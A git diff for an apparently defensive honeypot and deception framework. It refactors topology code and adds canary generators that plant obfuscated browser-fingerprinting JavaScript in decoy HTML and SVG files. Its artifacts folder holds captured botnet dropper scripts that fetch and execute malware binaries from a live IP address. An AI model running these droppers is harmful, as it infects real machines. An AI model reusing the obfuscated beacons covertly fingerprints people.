diff --git a/.gitignore b/.gitignore index bc75c3dd..67d247c5 100644 --- a/.gitignore +++ b/.gitignore @@ -51,3 +51,9 @@ schem # pydeps-style dependency graph dumps from local analysis runs. deps.txt + +# Node modules vendored under decnet/canary/ for the obfuscator helper. +# The package.json is the source of truth; modules are reinstalled at +# build/deploy time. +node_modules/ +package-lock.json diff --git a/README.md b/README.md index 21c17ac0..bce15306 100644 --- a/README.md +++ b/README.md @@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre | Slug | Services | OS Fingerprint | Description | |---|---|---|---| +| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. | | `windows-workstation` | smb, rdp | windows | Corporate Windows desktop | | `windows-server` | smb, rdp, ldap | windows | Windows domain member | | `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC | @@ -272,6 +273,11 @@ List live at any time with `decnet services`. Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code. ```ini +[deaddeck-1] +amount=1 +archetype=deaddeck +ssh.password=admin + [decky-webmail.http] server_header = Apache/2.4.54 (Debian) fake_app = wordpress diff --git a/artifacts/curl.sh b/artifacts/curl.sh new file mode 100644 index 00000000..805e4049 --- /dev/null +++ b/artifacts/curl.sh @@ -0,0 +1,3 @@ +[0] Downloading 'http://31.56.209.39/curl.sh' ... 
+Saving 'curl.sh.1' +HTTP response 200 OK [http://31.56.209.39/curl.sh] diff --git a/artifacts/curl.sh.1 b/artifacts/curl.sh.1 new file mode 100644 index 00000000..a6da0876 --- /dev/null +++ b/artifacts/curl.sh.1 @@ -0,0 +1,46 @@ +#!/bin/sh +ulimit -n 4096 +ulimit -n 999999 +ulimit -v 2097152 +cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x +rm -rf odin* +rm -rf bizy* +rm -rf rs* +rm -rf *.sh + +#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm +#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5 +#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6 +#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7 +#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips +#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle +#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF +#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF +#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86 +#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64 + +curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl +curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl +curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl +curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl +curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl +curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl +curl 
http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl +curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl +curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl +curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl +curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl +curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl +curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl + +curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5 +curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6 +curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7 +curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8 +curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips +curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl +curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss; +curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls; +curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv +curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86 +curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64 diff --git a/artifacts/evil.sh b/artifacts/evil.sh new file mode 100644 index 00000000..30cbec18 --- /dev/null +++ b/artifacts/evil.sh @@ -0,0 +1,3 @@ + wget http://31.56.209.39/wget.sh -o wget.sh + + wget http://31.56.209.39/curl.sh -o 
curl.sh diff --git a/artifacts/wget.sh b/artifacts/wget.sh new file mode 100644 index 00000000..3a4099e1 --- /dev/null +++ b/artifacts/wget.sh @@ -0,0 +1,3 @@ +[0] Downloading 'http://31.56.209.39/wget.sh' ... +Saving 'wget.sh.1' +HTTP response 200 OK [http://31.56.209.39/wget.sh] diff --git a/artifacts/wget.sh.1 b/artifacts/wget.sh.1 new file mode 100644 index 00000000..366613d9 --- /dev/null +++ b/artifacts/wget.sh.1 @@ -0,0 +1,46 @@ +#!/bin/sh +ulimit -n 4096 +ulimit -n 999999 +ulimit -v 2097152 +cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x +rm -rf odin* +rm -rf bizy* +rm -rf rs* +rm -rf *.sh + +wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm +wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5 +wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6 +wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7 +wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips +wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle +wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF +wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF +wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86 +wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64 + +wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget +wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget +wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget +wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget +wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget +wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget +wget 
http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget +wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget +wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget +wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget +wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget +wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget +wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget + +wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5 +wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6 +wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7 +wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8 +wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips +wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl +wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss +wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls +wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv +wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86 +wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64 diff --git a/decnet.tar b/decnet.tar new file mode 100644 index 00000000..02de619a Binary files /dev/null and b/decnet.tar differ diff --git a/decnet/agent/topology_ops.py b/decnet/agent/topology_ops.py index f8f156f2..7a03233d 100644 --- a/decnet/agent/topology_ops.py +++ b/decnet/agent/topology_ops.py @@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str: return str(tid) +def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> 
str: + """Verify hash integrity and structural validity; return topology_id.""" + local_hash = canonical_hash(hydrated) + if local_hash != version_hash: + raise HashMismatch( + f"master hash {version_hash!r} does not match agent hash " + f"{local_hash!r} — refusing to apply" + ) + issues = _validate_topology(hydrated) + if _validation_errors(issues): + raise ValidationError(issues) + return _topology_id(hydrated) + + +async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None: + """Tear down the current topology if it differs from topology_id. + + Master is authoritative — a different pinned topology (fully applied, + partially applied, or drifted) is torn down before the new apply proceeds. + Refusing with 409 would leave the agent stuck in a state only a human + could resolve. + """ + existing = store.current() + if existing is None or existing.topology_id == topology_id: + return + log.info( + "superseding topology %s with %s on master authority", + existing.topology_id, topology_id, + ) + try: + await teardown(existing.topology_id, store) + except Exception as exc: # noqa: BLE001 — we still want to try applying + log.warning( + "best-effort teardown of superseded topology %s failed: %s", + existing.topology_id, exc, + ) + # Hard-clear the store row so the new apply isn't blocked by a + # half-torn-down predecessor. Leftover docker objects surface via + # the next heartbeat's observed block. + store.clear(existing.topology_id) + + +def _materialise(hydrated: dict[str, Any], topology_id: str) -> None: + """Create bridge networks, write compose file, and bring up containers. + + Sync/blocking — callers must dispatch via asyncio.to_thread. + + ``--always-recreate-deps`` keeps service containers' netns shares + fresh: every decky service joins its base's netns via + ``network_mode: container:``, and that share is bound at + service start time. If a base is recreated (e.g. 
when ``ports:`` + changes after toggling ``forwards_l3``) but compose decides the + services are unchanged, the services keep a stale netns FD + pointing at the destroyed base — they end up in an empty + namespace with only ``lo``, and external traffic hits a closed + port on the live base. Forcing dependents to recreate alongside + the base is the cheapest way to make this race impossible. + """ + compose_path = _topology_compose_path(topology_id) + client = docker.from_env() + for lan in hydrated["lans"]: + net_name = _topology_network_name(topology_id, lan["name"]) + create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"]) + write_topology_compose(hydrated, compose_path) + _compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path) + + async def apply( hydrated: dict[str, Any], version_hash: str, @@ -73,76 +140,11 @@ async def apply( Any docker / compose error propagates up; the endpoint maps it to 500 and records the message on the store row. """ - local_hash = canonical_hash(hydrated) - if local_hash != version_hash: - raise HashMismatch( - f"master hash {version_hash!r} does not match agent hash " - f"{local_hash!r} — refusing to apply" - ) - - issues = _validate_topology(hydrated) - if _validation_errors(issues): - raise ValidationError(issues) - - topology_id = _topology_id(hydrated) - # Master is authoritative. If a different topology is pinned here - # — whether it fully applied, only partially applied (failure - # marker row + orphan containers), or drifted — teardown first, - # then accept the new one. Refusing with 409 would leave the - # agent stuck in a state only a human could resolve. 
- existing = store.current() - if existing is not None and existing.topology_id != topology_id: - log.info( - "superseding topology %s with %s on master authority", - existing.topology_id, topology_id, - ) - try: - await teardown(existing.topology_id, store) - except Exception as exc: # noqa: BLE001 — we still want to try applying - log.warning( - "best-effort teardown of superseded topology %s failed: %s", - existing.topology_id, exc, - ) - # Hard-clear the store row so the new apply isn't blocked - # by a half-torn-down predecessor. Leftover docker objects - # will surface via the next heartbeat's observed block. - store.clear(existing.topology_id) - - lans = hydrated["lans"] - compose_path = _topology_compose_path(topology_id) - client = docker.from_env() - - # Bridges + compose are sync/blocking; hop to a thread so we don't - # stall the event loop on a slow docker daemon. - def _materialise() -> None: - for lan in lans: - net_name = _topology_network_name(topology_id, lan["name"]) - internal = not lan["is_dmz"] - create_bridge_network( - client, net_name, lan["subnet"], internal=internal - ) - write_topology_compose(hydrated, compose_path) - # ``--always-recreate-deps`` keeps service containers' netns shares - # fresh: every decky service joins its base's netns via - # ``network_mode: container:``, and that share is bound at - # service start time. If a base is recreated (e.g. when ``ports:`` - # changes after toggling ``forwards_l3``) but compose decides the - # services are unchanged, the services keep a stale netns FD - # pointing at the destroyed base — they end up in an empty - # namespace with only ``lo``, and external traffic hits a closed - # port on the live base. Forcing dependents to recreate alongside - # the base is the cheapest way to make this race impossible. 
- _compose_with_retry( - "up", "--build", "-d", "--always-recreate-deps", - compose_file=compose_path, - ) - - await asyncio.to_thread(_materialise) - + topology_id = _check_hash_and_validate(hydrated, version_hash) + await _teardown_superseded(topology_id, store) + await asyncio.to_thread(_materialise, hydrated, topology_id) store.put(topology_id, version_hash, hydrated) - log.info( - "topology %s applied on agent (%d LANs)", topology_id, len(lans) - ) + log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"])) async def teardown( diff --git a/decnet/agent/topology_store.py b/decnet/agent/topology_store.py index 7112307e..86427597 100644 --- a/decnet/agent/topology_store.py +++ b/decnet/agent/topology_store.py @@ -63,6 +63,7 @@ class TopologyStore: # The agent is single-process, so there's no real contention — # sqlite's own connection lock is enough. self._conn = sqlite3.connect(str(db_path), check_same_thread=False) + self._conn.row_factory = sqlite3.Row self._conn.execute( "CREATE TABLE IF NOT EXISTS applied_topology (" " topology_id TEXT PRIMARY KEY," @@ -84,11 +85,11 @@ class TopologyStore: if row is None: return None return AppliedRow( - topology_id=row[0], - applied_version_hash=row[1], - hydrated=json.loads(row[2]), - applied_at=int(row[3]), - last_error=row[4], + topology_id=row["topology_id"], + applied_version_hash=row["applied_version_hash"], + hydrated=json.loads(row["hydrated_blob_json"]), + applied_at=int(row["applied_at"]), + last_error=row["last_error"], ) # ---------------------------------------------------------------- writes diff --git a/decnet/asn/iptoasn/provider.py b/decnet/asn/iptoasn/provider.py index fbd243b5..024c83a3 100644 --- a/decnet/asn/iptoasn/provider.py +++ b/decnet/asn/iptoasn/provider.py @@ -13,7 +13,7 @@ from typing import Sequence from decnet.asn.base import Provider from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all from decnet.asn.iptoasn.parse import parse_file -from 
decnet.asn.lookup import AsnLookup +from decnet.asn.lookup import AsnLookup, Range from decnet.asn.paths import ensure_root logger = logging.getLogger("decnet.asn.iptoasn.provider") @@ -54,7 +54,7 @@ class IptoasnProvider(Provider): "asn.iptoasn: cache load failed, rebuilding: %s", exc ) - ranges = [] + ranges: list[Range] = [] for path in self.data_paths(): if not path.exists(): continue diff --git a/decnet/bus/topics.py b/decnet/bus/topics.py index 3c89d7e4..528933e2 100644 --- a/decnet/bus/topics.py +++ b/decnet/bus/topics.py @@ -54,6 +54,7 @@ SYSTEM = "system" CREDENTIAL = "credential" ORCHESTRATOR = "orchestrator" CANARY = "canary" +SMTP = "smtp" # ─── Leaf event-type constants (the last segment of each topic) ────────────── @@ -83,6 +84,19 @@ DECKY_MUTATE_REQUEST = "mutate_request" # syslog sidechannel too) to interleave substrate-change markers into # attacker traversals. DECKY_MUTATION = "mutation" +# Per-service add/remove on a deployed decky (live; no full redeploy). +# Payload carries ``decky_name``, ``service_name``, optional +# ``topology_id``, and ``services`` (the post-mutation list). Consumers +# that watch substrate shape (correlator, dashboard, profiler) reconcile +# off these without waiting for the next decnet-state.json snapshot. +DECKY_SERVICE_ADDED = "service_added" +DECKY_SERVICE_REMOVED = "service_removed" +# Per-service config change (the schema-driven Inspector form). Payload +# carries ``decky_name``, ``service_name``, optional ``topology_id``, +# ``service_config`` (the new validated dict), and ``recreated`` — true +# when the operator hit Apply (container was force-recreated to pick up +# the new env), false when they only hit Save (DB-only). +DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed" # Attacker event types (second token under the ``attacker`` root). 
First # sighting, session boundary transitions, and score-threshold crossings @@ -381,6 +395,16 @@ def system_control(worker: str) -> str: return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}" +def smtp(event_type: str) -> str: + """Build ``smtp.``. + + *event_type* may contain dots (e.g. ``probe.pending``). + """ + if not event_type: + raise ValueError("smtp topic requires a non-empty event_type") + return f"{SMTP}.{event_type}" + + def _reject_tokens(*parts: str) -> None: """Reject topic segments that would break NATS-style tokenization. diff --git a/decnet/canary/_obfuscate_helper.js b/decnet/canary/_obfuscate_helper.js new file mode 100644 index 00000000..a1dbc067 --- /dev/null +++ b/decnet/canary/_obfuscate_helper.js @@ -0,0 +1,18 @@ +// Node helper invoked by decnet.canary.obfuscator. +// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout. +// Kept dependency-light on purpose: only javascript-obfuscator. +const JsObf = require('javascript-obfuscator'); + +let raw = ''; +process.stdin.setEncoding('utf8'); +process.stdin.on('data', (chunk) => { raw += chunk; }); +process.stdin.on('end', () => { + try { + const { code, options } = JSON.parse(raw); + const result = JsObf.obfuscate(code, options || {}); + process.stdout.write(result.getObfuscatedCode()); + } catch (e) { + process.stderr.write(String(e && e.stack || e)); + process.exit(2); + } +}); diff --git a/decnet/canary/base.py b/decnet/canary/base.py index 160dcd19..d9e05552 100644 --- a/decnet/canary/base.py +++ b/decnet/canary/base.py @@ -100,6 +100,12 @@ class CanaryArtifact: planting. Never leaked to the attacker-facing surface. """ + fingerprint_nonce: Optional[str] = None + """Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything + else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce`` + so the worker can validate incoming ``?k=`` params. 
+ """ + class CanaryGenerator(ABC): """Produces a fake artifact from scratch.""" diff --git a/decnet/canary/cultivator.py b/decnet/canary/cultivator.py index dbeb3b6d..a71d2290 100644 --- a/decnet/canary/cultivator.py +++ b/decnet/canary/cultivator.py @@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = { ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx", ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf", ContentClass.CANARY_MYSQL_DUMP: "mysql_dump", + ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html", + ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg", } @@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = { "honeydoc_pdf": "http", "ssh_key": "dns", # trip is DNS resolution of host comment "mysql_dump": "dns", # trip is DNS resolution of subdomain + "fingerprint_html": "http", # obfuscated JS beacons GET /c/ + "fingerprint_svg": "http", # same, embedded inside SVG + + +""" + + +_ROW_POOL = ( + ("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"), + ("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"), + ("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""), + ("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"), + ("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""), + ("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"), + ("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"), + ("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"), + ("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"), +) + + +def _build_rows(callback_token: str) -> tuple[str, int]: + pick = _stable_int(callback_token, "pick") % len(_ROW_POOL) + take = 5 + (_stable_int(callback_token, "take") % 4) + selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)] + cells = "\n".join( + "" + "".join(f"{c}" for c in row) + "" + for row in selected + ) + return cells, 
len(selected) + + +def _sync_label(callback_token: str) -> str: + day = _stable_int(callback_token, "day") % 28 + 1 + hour = _stable_int(callback_token, "hour") % 24 + return f"2026-04-{day:02d} {hour:02d}:14 UTC" + + +class FingerprintHtmlGenerator(CanaryGenerator): + """Synthesise an HTML page that fingerprints the browser opening it.""" + + name = "fingerprint_html" + + def generate(self, ctx: CanaryContext) -> CanaryArtifact: + mint_uuid = _mint_uuid_for(ctx.callback_token) + nonce = nonce_for(ctx.callback_token, mint_uuid) + payload = render_fingerprint_js( + callback_token=ctx.callback_token, + http_base=ctx.http_base, + mint_uuid=mint_uuid, + nonce=nonce, + ) + rows, row_count = _build_rows(ctx.callback_token) + body = _PAGE_TEMPLATE.format( + sync_label=_sync_label(ctx.callback_token), + row_count=row_count, + rows=rows, + payload=payload, + ) + beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}" + return CanaryArtifact( + path="", + content=body.encode("utf-8"), + mode=0o644, + mtime_offset=-86400 * 14, + generator=self.name, + fingerprint_nonce=nonce, + notes=[ + f"obfuscated fingerprinter beacons={beacon}", + f"mint_uuid={mint_uuid}", + ], + ) diff --git a/decnet/canary/generators/fingerprint_svg.py b/decnet/canary/generators/fingerprint_svg.py new file mode 100644 index 00000000..78fda748 --- /dev/null +++ b/decnet/canary/generators/fingerprint_svg.py @@ -0,0 +1,88 @@ +"""SVG fingerprint canary — standalone SVG with an embedded `` + +""" + + +_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east") + + +class FingerprintSvgGenerator(CanaryGenerator): + """Synthesise an SVG that fingerprints the browser opening it.""" + + name = "fingerprint_svg" + + def generate(self, ctx: CanaryContext) -> CanaryArtifact: + mint_uuid = _mint_uuid_for(ctx.callback_token) + nonce = nonce_for(ctx.callback_token, mint_uuid) + payload = render_fingerprint_js( + callback_token=ctx.callback_token, + http_base=ctx.http_base, + mint_uuid=mint_uuid, + 
nonce=nonce, + ) + region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)] + ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6) + day = _stable_int(ctx.callback_token, "day") % 28 + 1 + body = _DIAGRAM_TEMPLATE.format( + region=region, + ver=ver, + review=f"2026-03-{day:02d}", + payload=payload, + ) + beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}" + return CanaryArtifact( + path="", + content=body.encode("utf-8"), + mode=0o644, + mtime_offset=-86400 * 30, + generator=self.name, + fingerprint_nonce=nonce, + notes=[ + f"obfuscated fingerprinter beacons={beacon}", + f"mint_uuid={mint_uuid}", + ], + ) diff --git a/decnet/canary/obfuscator.py b/decnet/canary/obfuscator.py new file mode 100644 index 00000000..81b93e3e --- /dev/null +++ b/decnet/canary/obfuscator.py @@ -0,0 +1,177 @@ +"""Per-mint JS obfuscator wrapper. + +Thin Python wrapper around the ``javascript-obfuscator`` Node package. +Used by the fingerprint generators / instrumenters to produce a unique, +hard-to-statically-analyse JS blob per canary mint. + +Two design choices flow from the canary contract in :mod:`base`: + +* **Determinism.** Generators must return byte-identical artifacts for + the same ``(callback_token, http_base, dns_zone, persona)``. We + derive a numeric seed from the callback token and pass it to the + obfuscator's own ``seed`` option, and we derive the polymorphic + config bits from the same hash so a re-mint reproduces exactly. +* **Per-mint uniqueness.** Two different callback tokens produce + structurally different output: different identifier names, different + string-array rotation, optionally different transforms enabled. + +The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess. +We pass code+options as JSON on stdin and read the obfuscated result +from stdout. Stderr surfaces obfuscator failures. 
+""" +from __future__ import annotations + +import hashlib +import hmac +import json +import os +import subprocess # nosec B404 — Node helper exec is the whole point +from pathlib import Path +from typing import Any + +_HELPER = Path(__file__).parent / "_obfuscate_helper.js" +_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js" + +# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a +# specific runtime; default to PATH lookup. +_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node") + +# Hard timeout for the obfuscator subprocess. Real runs on the +# fingerprint payload sit well under 5s on a dev box. +_TIMEOUT_S = 30 + + +class ObfuscatorError(RuntimeError): + """Raised when the Node helper fails or returns empty output.""" + + +class FingerprintSecretMissing(RuntimeError): + """Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset. + + Fingerprint canaries embed a per-mint nonce derived from this + server-side secret; without it the worker cannot validate incoming + fingerprint beacons, so we fail loud at mint time rather than ship + a defeatable canary. + """ + + +_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password + + +def nonce_for(callback_token: str, mint_uuid: str) -> str: + """Compute the per-mint fingerprint nonce. + + HMAC-SHA256 keyed on the server-side master secret, message is + ``callback_token + "|" + mint_uuid``. Truncated to 16 hex chars + (~64 bits of entropy) — enough to defeat slug-only forgery while + fitting comfortably into a query string. 
+ """ + secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "") + if not secret: + raise FingerprintSecretMissing( + f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint" + ) + msg = f"{callback_token}|{mint_uuid}".encode("utf-8") + return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16] + + +def _seed_from_token(callback_token: str) -> int: + """Derive a 31-bit numeric seed from the callback token. + + ``javascript-obfuscator`` expects ``seed: number`` (int32-ish); + using a SHA-256-derived prefix gives us a uniform distribution + across the 31-bit positive range. + """ + h = hashlib.sha256(callback_token.encode("utf-8")).digest() + return int.from_bytes(h[:4], "big") & 0x7FFFFFFF + + +def _config_from_seed(seed: int) -> dict[str, Any]: + """Build a deterministic, per-mint obfuscator config. + + The hash bits drive *which* transforms apply — two mints get + structurally different outputs, not just different identifier names. + Defaults stay aggressive enough that reverse engineering is real + work; we never disable string-array or rename, only vary the dial. + """ + bits = seed + encodings = ("base64", "rc4") + string_array_encoding = [encodings[bits & 1]] + control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0 + dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. 
~0.7 + transform_object_keys = bool((bits >> 17) & 1) + numbers_to_expressions = bool((bits >> 18) & 1) + simplify = bool((bits >> 19) & 1) + return { + "compact": True, + "seed": seed, + "controlFlowFlattening": True, + "controlFlowFlatteningThreshold": round(control_flow_threshold, 3), + "deadCodeInjection": True, + "deadCodeInjectionThreshold": round(dead_code_threshold, 3), + "stringArray": True, + "stringArrayEncoding": string_array_encoding, + "stringArrayThreshold": 1, + "stringArrayRotate": True, + "stringArrayShuffle": True, + "splitStrings": True, + "splitStringsChunkLength": 4 + (bits & 7), + "transformObjectKeys": transform_object_keys, + "numbersToExpressions": numbers_to_expressions, + "simplify": simplify, + "selfDefending": False, # breaks SVG embed; not worth the cost + "renameGlobals": False, + "identifierNamesGenerator": "mangled-shuffled", + } + + +def obfuscate(code: str, *, callback_token: str) -> str: + """Obfuscate *code* deterministically per *callback_token*. + + Raises :class:`ObfuscatorError` if Node fails or returns empty. 
